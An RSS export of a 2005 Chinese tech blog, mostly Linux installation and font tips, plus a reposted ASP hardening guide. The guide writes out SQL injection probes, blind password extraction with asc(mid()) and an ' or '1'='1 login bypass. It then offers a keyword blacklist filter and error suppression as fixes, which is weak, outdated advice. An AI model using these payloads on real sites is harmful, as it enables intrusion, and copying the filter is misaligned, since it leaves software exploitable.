<?xml version="1.0" encoding="GB2312"?>  
<rss version="2.0" 
xmlns:dc="http://purl.org/dc/elements/1.1/" 
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
xmlns:admin="http://webns.net/mvcb/" 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> 
  
<channel> 
<title><![CDATA[exploit's  blog]]></title> 
<link>http://heijin.bokee.com/index.html</link> 
<description><![CDATA[！！！！！！！！！！！！ * ？？？？？？？？？？？ *     ！！！！！！！！！！！





]]></description> 
<dc:language>zh-cn</dc:language> 
<dc:creator>iaqqqqmqj@eyou.com</dc:creator> 
<dc:date>2005-12-02T21:47:11Z</dc:date> 
<admin:generatorAgent rdf:resource="http://blog.bokee.com.com" /> 

<item> 
<title><![CDATA[blog搬家了！]]></title> 
<link>http://heijin.bokee.com/3745837.html</link> 
<description><![CDATA[新blog入口：<a href="http://heijin.blog.sohu.com/">heijin.blog.sohu.com</a>]]></description> 
<guid isPermaLink="false">3745837@http://heijin.bokee.com/</guid> 
<dc:subject>我的唠叨</dc:subject> 
<dc:date>2005-12-02T21:47:08Z</dc:date> 
</item> 
<item> 
<title><![CDATA[ASP安全配置不完全手册]]></title> 
<link>http://heijin.bokee.com/3674833.html</link> 
<description><![CDATA[<p>作者：<a href="https://www.xfocus.net/bbs/index.php?lang=cn&amp;act=Profile&amp;do=03&amp;MID=80429">Bluephantom</a></p><p>——从asp程序编写到服务器配置<br /><br />ASP全称Active Server Pages，是微软推出的用来取代CGI（Common Gateway Interface）的动态服务器网页技术。由于ASP比较简单易学，又有微软这个强大后台的支持，所以应用比较广泛，相对来说发现的缺陷和针对各程序的漏洞也比较多。ASP可运行的服务器端平台包括：WinNT、Win2k、WinXP和Win2003，在Win98环境下装上PWS4.0也可以运行。现在我们就针对Win2k和Win2003这两个系统来谈谈ASP的安全配置。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br />ASP程序安全篇：<br />在做安全配置前，我们先了解一下入侵者的攻击手法。现在很流行注入攻击，所谓注入攻击，就是利用提交特殊地址将ASP中引用的正常SQL语句和入侵者所需要的SQL语句一并执行，使入侵者达到入侵的目的。现在更是有一些脚本注入工具发布，使菜鸟也可以轻松完成对ASP的注入攻击。那么我们先来了解一下这些工具是怎样注入的。<br />首先，入侵者会对一个网站确定可不可以进行注入，假设一篇文章的地址为：<a href="http://www.scccn.com/news.asp?id=1" target="_blank">http://www.scccn.com/news.asp?id=1</a>一般会以提交两个地址来测试，如：<br /><a href="http://www.scccn.com/news.asp?id=1" target="_blank">http://www.scccn.com/news.asp?id=1</a> and 1=1<br /><a href="http://www.scccn.com/news.asp?id=1" target="_blank">http://www.scccn.com/news.asp?id=1</a> and 1=2<br />第一个地址后面加了 and 1=1，构成的SQL语句也就变为了：Select * from 表单名 where id=1 and 1=1这句话要成立就必须and前后语句都成立。那么前面的文章地址是可以访问的，后面的1=1也是客观成立的，那么第一个地址就可以正常显示；相反1=2是显然不成立的，关键就看这步了，如果提交and 1=2页面还是正常显示说明他并没有将and 1=2写入SQL语句，此站也就不存在注入漏洞；但如果提交and 1=2之后返回了错误页面则说明此站点将后面的语句带入了SQL语句并执行了，也就说明他可以进行SQL注入。（注：如果地址后面跟的是news.asp?id='1'就得变为news.asp?id=1' and '1'='1来补全引号了）<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;那么，知道可以注入后入侵者可以做什么呢？<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;这里就简单的说一下，比如提交这样的地址：<br /><a href="http://www.scccn.com/news.asp?id=1" target="_blank">http://www.scccn.com/news.asp?id=1</a> and exists (select * from 表名 where 列名=数据)<br />根据返回的正确或错误页面来判断猜的表名和列名是否正确，具体实现时是先猜表名再猜列名。当猜出表名和列名之后还可以用ASC和MID函数来猜出各列的数据。MID函数的格式为：mid(变量名,第几个字符开始读取,读取几个字符)，比如：mid(pwd,1,2)就可以从变量pwd中的第一位开始读取两位的字符。ASC函数的格式为：ASC（&amp;quot;字符串&amp;quot;），如：asc(&amp;quot;a&amp;quot;)就可以读出字母a的ASCII码了。那么实际应用的时候就可以写为：asc(mid(pwd,1,1))这样读取的就是pwd列的第一个字符的ASCII码，提交： asc(mid(pwd,1,1))&amp;gt;97以返回的页面是否为正确页面来判断pwd列的第一个字符的ASCII码是否大于97（a的ASCII码），如果正确就再试是否小于122（z的ASCII码）……这样慢慢缩小字符的ASCII码的范围，猜到真实的ASCII码也只是时间的问题。一位一位的猜就可以得到数据库中的用户名和密码了。还有一种ASP验证缺陷——就是用户名和密码都输'or '1'='1，构造SQL语句Select * form 表单名 where username='' or '1'='1' and pwd='' or '1'='1'就可以达到绕过密码验证的目的。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;说了那么多，其实防范的方法很简单，我们把特殊字符（如and、or、'、&amp;quot;）都禁止提交就可以防止注入了。ASP传输数据分为get和post两种，&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;get是通过将数据添加到URL后提交的方式，post则是利用邮寄信息数据字段将数据传送到服务器。<br />那么，我们先来看看如何将get方式提交数据中的特殊字符过滤。首先要知道，IIS是以字符串的形式将get请求传给asp.dll的，在将数据传递给Request.QueryString之后，asp解析器会解析出Request.QueryString的信息，然后跟据&amp;quot;&amp;amp;&amp;quot;来分出各个数组内的数据。现在我们要让get方式不能提交以下字符：<br />'、and、exec、insert、select、delete、update、count、*、%、chr、mid、master、truncate、char、declare<br />那么，防止get方式注入的代码就如下：<br /><!--r />dim sql_leach,sql_leach_0,Sql_DATA<br />sql_leach = "',and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare"<br />sql_leach_0 = split(sql_leach,",")<br /><br />If Request.QueryString<>"" Then<br />For Each SQL_Get In Request.QueryString<br />For SQL_Data=0 To Ubound(sql_leach_0)<br />if instr(Request.QueryString(SQL_Get),sql_leach_0(Sql_DATA))>0 Then<br />Response.Write "请不要尝试进行SQL注入！"<br />Response.end<br />end if<br />next<br />Next<br />End If<br /--><br />其中，变量sql_leach中的字符串就是指定过滤的字符，以&amp;quot;,&amp;quot;隔开。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;接着过滤post提交方式的注入，我们可以看到，request.form也是以数组形式存在的，只要对它再进行一次循环判断就可以了。防止以post方式注入的ASP代码如下：<br /><!--r />If Request.Form<>"" Then<br />For Each Sql_Post In Request.Form<br />For SQL_Data=0 To Ubound(sql_leach_0)<br />if instr(Request.Form(Sql_Post),sql_leach_0(Sql_DATA))>0 Then<br />Response.Write "请不要尝试进行SQL注入！"<br />Response.end<br />end if<br />next<br />next<br />end if<br /--><br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;这样，get和post注入都被禁止了。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;另外就是数据库的问题，首先现在很流行的用*.asp命名数据库已经没什么意义了，因为可以用下载软件来下载；在数据库名前加#的作用也不大，虽然访问时浏览器只访问#前面的内容，但是如果将#用其unicode表达法（%23）替换掉就可以访问了。既然这样，那么我们禁止入侵者暴库就可以了。一般暴数据库的方法，是将读取数据库的文件名（如conn.asp）前的&amp;quot;/&amp;quot;替换为&amp;quot;%5c&amp;quot;（&amp;quot;\&amp;quot;的unicode表达法）这样就可以使ASP将%5c解释为访问网站根目录，而实际是数据库不在指定位置，找不到数据库，再将IE设置为&amp;quot;显示友好的HTTP错误信息&amp;quot;的情况下自然就暴出了数据库的路径。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;防范的方法也比较简单，就是让ASP程序即使在出错的情况下也不报错直接执行下一步就可以了。在ASP文件中加这么一句：on error resume next就OK了。<br />还有几点要注意的：<br />1.数据库命名长些并尽量放在网站根目录下，数据库的表名和字段名尽量不合常规；2.保存敏感信息（如用户和密码）的数据库尽量和在前台页面引用的数据库分开（如果用新的暴库方法由前台页面暴出了数据库，那么入侵者也得不到有价值的信息）；3.后台的目录名和登陆页面的名字要改的不寻常些，千万不可出现admin或者login之类的字符，以免被注入软件扫描到后台。4.如果前台或后台有上传文件的功能，切记不能有任何其他功能直接的或间接的拥有更改文件名的权限。这样的多重保障就更加安全些了。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;<br /><br />ASP服务器安全配置篇（针对win2k和win2003）：<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;我们从裸机说起——<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;首先，拔掉网线，按需求分区之后将所有盘格式化为NTFS，在D盘安装系统。系统装完之后立刻做一个裸系统的ghost备份，以防后面配置的过程中出意外。<br />&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;先把驱动都装上是必要的。之后先装防火墙，选择一款好的防火墙是很重要的。能买硬件防火墙最好，推荐的选择：cisco pix系列、天融信 NGFW系列、冰之眼（入侵检测系统）。没有硬件防火墙的情况下，使用软件防火墙，推荐：Blackice（我个人的最爱）、Checkpoint（以色列国家级防火墙）、ZoneAlarm（不太熟悉，但口碑不错），虽然比较喜欢天网防火墙，但是不推荐服务器用天网。<br />装完防火墙装杀毒软件，推荐：KV江民杀毒软件（好东西）、诺顿（虽然好，但比较霸道）、卡巴斯基（听说比较耗内存，但对病毒疗效狂好）。<br />开始安装各种需要的软件，如果是2003系统，别忘了装IIS。以上所有软件都装在一个非系统盘的指定盘里。<br />下面开始给系统打补丁，首先用手头有的光盘给2k打上SP4或给2003打上SP1。在本地操作的情况下将能打系统和软件的补丁都打上。之后，在确认防火墙和杀毒软件都设置好的情况下插上网线，开始window update，并升级杀毒软件至最新病毒库。打完所有的系统和软件的补丁之后，将网线拔掉，把所有临时文件和系统补丁留下的卸载文件全部删除，如果觉得占用空间太多还可以把%systemroot%\System32\dllcache\下的所有文件删除（系统备份文件），这将使最后的ghost备份文件体积比较小。然后再次用ghost备份系统。<br />之后删除不安全的组件，需要将WScript.Shell, WScript.Network, Shell.application删除掉。在cmd下分别输入（以2k为例，2003路经为D:\windows）：<br />regsvr32/u D:\WINNT\System32\wshom.ocx<br />del D:\WINNT\System32\wshom.ocx<br />重新启动，就OK了。另外入侵者可以利用getobject(&amp;quot;WINNT&amp;quot;)获得用户和进程的列表，可以将Workstation服务禁用作为防范措施。<br />设置权限是必要的。首先，确定IIS里要建立几个站点，之后为每个站点建立一个用户。在IIS站点的目录安全性里选择让这个用户作为匿名访问的帐户。再设置所有分区都禁止这个用户访问，而在站点对应的文件夹设置允许此用户访问。这样即使站点被入侵，入侵者也拿不到服务器的shell。<br />一切做好之后用ghost再次备份，并将做好的备份文件放在与服务器不在同一局域网的机器上或相对安全的地方。插上网线，服务器就可以安全的正常工作了。之后可以在每次服务器重起时还原一次系统，这都是后话了。<br /><br /><br />好了，基本上就这么多了，以上说的可能不太完全，仅作参考之用，不足之处还请高手多多补充。欢迎各位来中国网络安全中心交流：<a href="http://www.scccn.com/" target="_blank">http://www.scccn.com</a>。<br /><br />Bluephantom作于2005年 </p>]]></description> 
<guid isPermaLink="false">3674833@http://heijin.bokee.com/</guid> 
<dc:subject>安全文摘</dc:subject> 
<dc:date>2005-11-28T00:02:03Z</dc:date> 
</item> 
<item> 
<title><![CDATA[FC安装及问题索引(不定期更新) ]]></title> 
<link>http://heijin.bokee.com/3125556.html</link> 
<description><![CDATA[<a href="http://www.linuxeden.com/forum/t132115.html">http://www.linuxeden.com/forum/t132115.html</a>]]></description> 
<guid isPermaLink="false">3125556@http://heijin.bokee.com/</guid> 
<dc:subject>Linux学习</dc:subject> 
<dc:date>2005-10-05T07:47:41Z</dc:date> 
</item> 
<item> 
<title><![CDATA[Linux办公一条龙之初识OpenOffice]]></title> 
<link>http://heijin.bokee.com/3108961.html</link> 
<description><![CDATA[<span class="tpc_content"><font size="2">著名的OpenOffice(下文简称为OO)项目是1999年Sun公司收购了StarOffice后的开源项目。基于OO的产品也层出不穷，典型的如Sun的StarOffice(亚洲版本称为StarSuite)、中文2000的RedOffice、中标软的普华Office以及刚刚发布的金山飓风办公等。因此，学好OpenOffice，基本上就学会了好几种Linux下的办公软件了。 <br /><br />　　一、OpenOffice的功能模块 <br /><br />　　OO主要是由四大模块即文字处理模块Writer、电子表格模块Calc、幻灯片模块Impress以及绘图模块Draw组成，对于这些大家可以参见Linux一月通专题中的有关介绍。 <br /><br />　　它和微软Office最大的区别是OO的设计理念更趋于集中整合，虽然OO文档看似保存为不同扩展名的文件，其实都是采用XML格式保存后再使用ZIP压缩算法压缩得到的。所以只要一次性启动OO后，创建/打开不同文档不必像微软Office那样分别启动不同的程序，而只是变化为相应的界面而已，下面笔者就详细介绍一下OO中使用频率最高的模块Writer的使用。 <br /><br />　　小知识:OpenOffice文档扩展名知多少 <br /><br />　　Writer文档的扩展名为sxw <br />　　Calc文档的扩展名为sxc <br />　　Impress文档的扩展名为sxi <br />　　Draw文档的扩展名为sxd <br /><br />　　提示：OO的衍生产品如StarSuite6/7、RedOffice、普华Office、即时Office以及金山飓风办公大致都是由这四个模块构成，使用上也类似，只不过特色有所不同而已，大家可以触类旁通、举一反三地学习。 <br /><br />　　二、认识Writer <br /><br />　　Writer的界面很具有代表性，熟练地掌握了它的界面后对于其他模块的学习会有很大的帮助！下面笔者就以中文本地化比较好的RedOffice 为例来介绍一下Writer的使用。Writer主界面如图1所示。 <br /><br /></font><div align="center"><font size="2"><img onclick="function anonymous()
{
if(this.width>screen.width-461) window.open('httpupload/forum/2005518192553.gif');
}" src="http://www.linuxext.com/bbs/httpupload/forum/2005518192553.gif" onload="function anonymous()
{
if(this.width>screen.width-460)this.width=screen.width-460
}" border="0" /></font></div><br /><div align="center">图 1</div><br /><br />　　界面上部和Word基本相同，不同的是其左侧多一个主工具栏，该栏按钮从上到下依次为插入、插入域、绘图、表单、图文集、定位光标、打开/关闭拼写检查、查找、数据源、非打印字符、关闭图形对象显示和Web版式。其中插入、绘图，表单都可以拖动为浮动工具栏。 <br /><br />　　提示：在熟悉界面的过程中最好能和自己熟悉的Word的常用功能对应起来！ <br /><br />　　三、用 Writer创建自己第一份Linux文档 <br /><br />　　下面就以对汉字支持很好与OO界面一致的RedOffice为例来创建第一份Writer文档。 <br /><br />　　1.新建一个Writer文档 <br /><br />　　选择Writer的主菜单“文件→新建→文字处理”便可创建一份空白的Writer文档。 <br /><br />　　小技巧：Writer窗口处于激活状态，使用快捷键“Ctrl+N”可以便捷地创建文档。 <br /><br />　　2.输入标题及其设置 <br /><br />　　输入文档的标题，然后拖动鼠标，标题处于反白状态，这时在字号下拉列表中选择三号字，然后选择旁边的粗体按钮加粗标题使之更加突出。最后使用Home键定位光标，然后单击居中按钮将标题置于文档上方正中位置。另起一行输入文档起草人后便可编辑正文了！ <br /><br />　　小技巧：如果文章比较长，会常常找不到光标位置的情况，这时只要单击一下主工具栏的定位光标键便可迅速找到光标！ <br /><br />　　3.插入图片 <br /><br />　　优秀的文档怎能没有精美的图片呢？选择主菜单“插入→图形→从文件”后便会弹出插入图形对话框，从中找到要插入的图片文件，确定后便可插入到文档中，双击插入的图片就会弹出图形对话框，在该对话框中可以设置文字环绕，边框以及完成图片的裁剪与翻转。详细选项请参照图2。 <br /><div align="center"><img onclick="function anonymous()
{
if(this.width>screen.width-461) window.open('httpupload/forum/2005518192700.gif');
}" src="http://www.linuxext.com/bbs/httpupload/forum/2005518192700.gif" onload="function anonymous()
{
if(this.width>screen.width-460)this.width=screen.width-460
}" border="0" /></div><br /><div align="center">图2</div><br />4.插入表格 <br /><br />　　一个具有说服力的文档不能没有表格，选择主菜单“插入→表格”后便会弹出插入表格对话框，在该对话框中简单地设置一下行数和列数便可立即生成表格，接下来便可输入内容编辑表格了！插入表格对话框请参照图3。 <br /><br /><div align="center"><img onclick="function anonymous()
{
if(this.width>screen.width-461) window.open('httpupload/forum/2005518192808.gif');
}" src="http://www.linuxext.com/bbs/httpupload/forum/2005518192808.gif" onload="function anonymous()
{
if(this.width>screen.width-460)this.width=screen.width-460
}" border="0" /></div><br /><div align="center">图3</div><br />5.为表格添加日期 <br /><br />　　由于表格中的内容具有很强的时效性，所以很有必要为表格添加日期时间，将光标定位到表格的右下角，从主菜单选择“插入→日期时间”后便会出现日期和时间对话框。Writer提供了多种日期格式供大家选择，选择一种格式确定后就OK了！ <br /><br />　　6.字数统计 <br /><br />　　大家的第一份具有实用价值的Linux文档终于完成了，统计一下文档字数是十分必要的，在主菜单种选择“文件→属性→统计标签页”便可看到准确的字数统计，这对于撰稿人来说尤为重要噢！ <br /><br />　　看到这里相信大家对OpenOffice项目有所了解了吧！还不快赶紧启动你的Writer练练手？ </span>]]></description> 
<guid isPermaLink="false">3108961@http://heijin.bokee.com/</guid> 
<dc:subject>Linux学习</dc:subject> 
<dc:date>2005-10-03T12:22:32Z</dc:date> 
</item> 
<item> 
<title><![CDATA[/etc/fstab文件修改后可以自动挂载，并显示中文目录]]></title> 
<link>http://heijin.bokee.com/3107567.html</link> 
<description><![CDATA[<span class="tpc_content"><font size="2">这是我在网上找到的/etc/fstab文件修改后可以自动挂载，并显示中文目录，这个比较实用，希望大家能派上用场，下面就是例子。 <br /><br /># /etc/fstab: static file system information. <br /># <br /># <file system="" /><mount point="" /><type /><options /><dump /><pass /><br />proc /proc proc defaults 0 0 <br />/dev/hdc2 / ext3 defaults,errors=remount-ro 0 1 <br />/dev/hdc5 none swap sw 0 0 <br />/dev/hdb /media/cdrom0 iso9660 ro,user,noauto 0 0 <br />/dev/hda1 /mnt/win_c vfat codepage=936,iocharset=cp936 0 0 <br />/dev/hda5 /mnt/win_d ntfs iocharset=cp936 0 0 <br />/dev/hda6 /mnt/win_e ntfs iocharset=cp936 0 0 <br />/dev/hda7 /mnt/win_f vfat codepage=936,iocharset=cp936 0 0 <br />/dev/hda8 /mnt/win_g vfat codepage=936,iocharset=cp936 0 0 <br />/dev/hdc1 /mnt/win_h vfat codepage=936,iocharset=cp936 0 0</font></span><br /><!---->]]></description> 
<guid isPermaLink="false">3107567@http://heijin.bokee.com/</guid> 
<dc:subject>Linux学习</dc:subject> 
<dc:date>2005-10-03T08:53:07Z</dc:date> 
</item> 
<item> 
<title><![CDATA[FC4安装全过程及优化]]></title> 
<link>http://heijin.bokee.com/3103834.html</link> 
<description><![CDATA[<p>来源：linuxfans.org</p><p>刚刚下载完FC4，安装完了，现在把我安装的大体经过写一下，仅供参考。 <br />一，硬盘安装： <br />1.下载 iso文件： <br />FC4-i386-DVD.isohttp://download.fedora.redhat.com/pub/fedora/linux/core/4/i386/iso/FC4-i386-DVD.iso <br />放在一个 fat32 或ext3分区上，我是：Windows Xp+ Fedora Core 4 双启动，下载完ISO文件放在一个Fat32分区上（最好不要放在NTFS分区上），然后用 WinRAR 提取ISO文件里的isolinux 目录一个分区上（如：可以在Windows Xp 里面用WINRAR提取 光盘镜像里 isolinux 目录到C：\下）。 <br />2.下载：Grub For Dos ： <br /><a href="http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&amp;op=geninfo&amp;did=3608" target="_blank">http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&amp;amp;op=geninfo&amp;amp;did=3608</a> <br />解压到C:\下，编辑 boot.ini 文件，加入： <br />[boot loader] <br />timeout=30 <br />default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS <br />[operating systems] <br />multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=&amp;quot;Microsoft Windows XP Professional&amp;quot; /noexecute=optin /fastdetect <br />C:\grldr=&amp;quot;GRUB For Dos/Windows &amp;quot; <br />编辑C:\boot\grub\menu.lst 加入： <br />title Install-Fedora Core 4 <br />kernel (hd0,0)/isolinux/vmlinuz <br />initrd (hd0,0)/isolinux/initrd.img <br />3.重新启动电脑，依次选择： GRUB For Dos/Windows &amp;gt; Install-Fedora Core 4 <br />进入安装程序，在安装过程中当进行到选择安装介质时，选 硬盘安装。 <br />4.按提示一步步安装，直到完成重启！ <br />5.安装完成后运行 yum update 更新系统 <br />#rpm -import /usr/share/rhn/RPM-GPG-KEY-fedora <br />#yum update <br />6.安装中文输入法Fcitx <br />下载 Fcitx-3.1：http://www.linuxfans.org/nuke/modul...geninfo&amp;amp;did=360 <br />安装： #rpm -ivh fcitx-3.1-1mgc.i686.rpm <br />7.在/etc/X11/xinit/xinput.d下面创建一个自己的输入法的脚本 fcitx 内容为： <br />XIM=fcitx <br />XIM_PROGRAM=fcitx <br />GTK_IM_MODULE=fcitx <br />gnome-im-settings-daemon &amp;gt;/dev/null <br />添加配置： <br />#alternatives –install /etc/X11/xinit/xinput.d/zh_CN xinput-zh_CN /etc/X11/xinit/xinput.d/fcitx 100 <br />#alternatives --auto xinput-zh_CN <br />重启X Window 生效！ <br />8.安装Mp3播放器XMMS（ FC4中默认是没有XMMS的） <br /><br />#yum install xmms <br />2.安装mp3 插件：xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm ： <br /><a href="http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&amp;op=geninfo&amp;did=3060" target="_blank">http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&amp;amp;op=geninfo&amp;amp;did=3060</a> <br />#rpm -ivh xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm <br />3.安装Realplayer：http://www.linuxfans.org/nuke/modul...eninfo&amp;amp;did=3166 <br />#rpm -ivh RealPlayer-10.0.4.750-20050401.i586.rpm <br />4.安装ＬｕｍａＱＱ的话去下载lumaqq然后解压就可以用的，很简单的。 <br />还有一个必备软件就是星际译王了。我们可以到它主页下载主程序包http://stardict.sourceforge.net/stardict-2.4.4-1.i386.rpm <br />sdcv-0.1.tar.bz2这个是字符下用的 <br />WyabdcRealPeopleTTS这个是语音文件 <br />#rpm -Uvh stardict-2.4.4-1.i386.rpm <br />安装主程序 <br />字典到http://stardict.sourceforge.net/Dictionaries_zh_CN.php下载，自己因需选 <br /><br />如何关闭 ipv6 以解决域名解析慢的问题：将下面两行追加到 /etc/modprobe.conf <br /><br />alias net-pf-10 off <br />alias ipv6 off <br /><br /><br />美化字体不许要补丁,也不需要打命令,方法如下: <br />1:安装完毕后进入 <br />[root@S01 ~]#cd /usr/share/fonts/chinese/TrueTypa <br />2:删除:ghai00mp.ttf/gbsn00lp.ttf/bsmi00lp.ttf/bkai00mp.ttf四个字体文件 <br />[root@S01 ~]#rm -rf ghai00mp.ttf gbsn00lp.ttf bkai00mp.ttf <br />3:将simsun.ttc重命名为:ghai00mp.ttf和bkai00mp.ttf,并放到/usr/share/fonts/chinese/TrueTypa下 <br />simsun 下载地址： <a href="http://ants.keepso.com/cgi-bin/bfile?word=simsunttc" target="_blank">http://ants.keepso.com/cgi-bin/bfile?word=simsunttc</a> <br />4:重起系统就可以看到保留英文字体,而中文字体变成新宋体的操作界面了! <br />如何让x0mms播放列表里显示正确的中文(myxfc) <br />-*-*-*-*-*-iso8859-1,-misc-simsun-medium-r-normal--12-*-*-*-*-*-gbk-0,*-r- <span class="postbody"><br /></span></p>]]></description> 
<guid isPermaLink="false">3103834@http://heijin.bokee.com/</guid> 
<dc:subject>Linux学习</dc:subject> 
<dc:date>2005-10-02T19:50:34Z</dc:date> 
</item> 
<item> 
<title><![CDATA[RedHat 9.0及8.0美化]]></title> 
<link>http://heijin.bokee.com/3094905.html</link> 
<description><![CDATA[<p><font color="#ff0000">注意事项：<br /><br />1.linux的命令和文件名有大小写之分<br /><br />2.美化之前，把你所要改动的原文件备份一下<br />比如，我想备份/root目录下的.bashrc,前面有个小点。不要忘记了。要这样做<br />#cd /root<br />#cp .bashrc .bashrc.BAK<br /><br />如果我们失误时，我们能够还原，方法如下：<br />#cp .bashrc.BAK .bashrc<br /><br />3.修改相关文件的工具，用vi或者kate，请不要用gedit。切记！！<br /><br />4.simsun.ttc；fonts.dir；fonts.scale三个文件是在一个目录里，也就是说是在同一个目录里/home/fonts<br /><br />5.值得注意的是，我们用的是simsun.ttc，不是simsun.ttf来美化。如果您有simsun.ttf字体，可以把simsun.ttf改成simsun.ttc。注意文件的后缀。<br /><br /></font></p><p>1.在/home目录下建一个目录fonts<br />在菜单上点-》系统工具-》终端，然后输入建立目录命令<br /><br />[root@linuxsir01 root]# mkdir /home/fonts<br /><br />2.然后把simsun.ttc字体拷到/home/fonts目录下。如果您没有simsun.ttc，只有simsun.ttf，我们也可以把 simsun.ttf改名为simsu.ttc。如果您的字体是在windows的分区。我们可以用mount来解决。如何用mount，因为内容比较多，建议用您看一下置顶的帖子。<br /><br />如果是simsun.ttf，我们就为simsun.ttf改名为simsun.ttc，假如您已经把simsun.ttf拷到了/home/fonts，就按如下的操作来完成。如果您的字体已经是simsun.ttc了，就没有必要做这步了。<br /><br />[root@linuxsir01 root]# cd /home/fonts<br /><br />[root@linuxsir01 fonts]# mv simsun.ttf simsun.ttc<br /><br />3.为simsun.ttc来建字体文件，总共有两个，分别是fonts.dir和fonts.scale。我们还是在simsun字体所处的目录/home/fonts操作<br /><br />进入/home/fonts目录<br /><br />[root@linuxsir01 root]#cd /home/fonts<br /><br />用touch先来建一fonts.dir文件<br /><br />[root@linuxsir01 fonts]# touch fonts.dir<br /><br /><br />看一下，我们是不是把fonts.dir文件建好了？<br />[root@linuxsir01 fonts]# ls<br /><br />然后，我们用kate编辑器来打开fonts.dir，还是要在/home/fonts目录里操作<br />[root@linuxsir01 fonts]#kate fonts.dir<br /><br />然后把下面的蓝色的一段拷入kate打开的fonts.dir文件，然后保存退出。<br /><font color="#0000ff"><br />31<br />simsun.ttc -misc-fixed-medium-r-normal--0-0-0-0-c-0-gb2312.1980-0<br />simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=0.2:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=0.4:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-gb2312.1980-0<br />ab=y:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=0.2:ab=y:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=0.4:ab=y:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-gb2312.1980-0<br />sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-iso8859-1<br />ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-iso8859-1<br />ai=0.2:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-iso8859-1<br />ai=0.4:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-iso8859-1<br />ai=0.2:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-iso8859-1<br />ai=0.4:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-iso8859-1<br />ai=-0.2:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-iso8859-1<br />ai=-0.4:sw=1:bw=0.5:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-iso8859-1<br />ai=-0.2:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-iso8859-1<br />ai=-0.4:ab=y:sw=1:bw=0.5:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-iso8859-1<br />ai=-0.4:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=-0.4:ab=y:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=-0.2:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-gb2312.1980-0<br />ai=-0.2:ab=y:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-gb2312.1980-0<br />simsun.ttc -misc-simsun-medium-r-normal--0-0-0-0-c-0-gbk-0<br />ai=0.2:simsun.ttc -misc-simsun-medium-o-normal--0-0-0-0-c-0-gbk-0<br />ai=0.4:simsun.ttc -misc-simsun-medium-i-normal--0-0-0-0-c-0-gbk-0<br />ab=y:simsun.ttc -misc-simsun-bold-r-normal--0-0-0-0-c-0-gbk-0<br />ai=0.2:ab=y:simsun.ttc -misc-simsun-bold-o-normal--0-0-0-0-c-0-gbk-0<br />ai=0.4:ab=y:simsun.ttc -misc-simsun-bold-i-normal--0-0-0-0-c-0-gbk-0<br />ai=-0.4:simsun.ttc -misc-simsun-medium-ri-normal--0-0-0-0-c-0-gbk-0<br />ai=-0.4:ab=y:simsun.ttc -misc-simsun-bold-ri-normal--0-0-0-0-c-0-gbk-0<br />ai=-0.2:simsun.ttc -misc-simsun-medium-ro-normal--0-0-0-0-c-0-gbk-0<br />ai=-0.2:ab=y:simsun.ttc -misc-simsun-bold-ro-normal--0-0-0-0-c-0-gbk-0<br /><br /></font><br />注：您也下地附件，把下载的附件font.txt的拷到/home/fonts目录下，并改名为fonts.dir和fonts.scale<br /><a href="http://www.linuxsir.com/bbs/attachment.php?s=&amp;attachmentid=2389" target="_blank"><font color="#336699">http://www.linuxsir.com/bbs/attachm...tachmentid=2389</font></a> <br />假如您把附件下载到了/root目录下，就要如下操作<br />[root@linuxsir01 root]# cp font.txt /home/fonts/fonts.dir<br />[root@linuxsir01 root]# cp font.txt /home/fonts/fonts.scale<br />这样就完成了，应该很简单吧。<br /><br 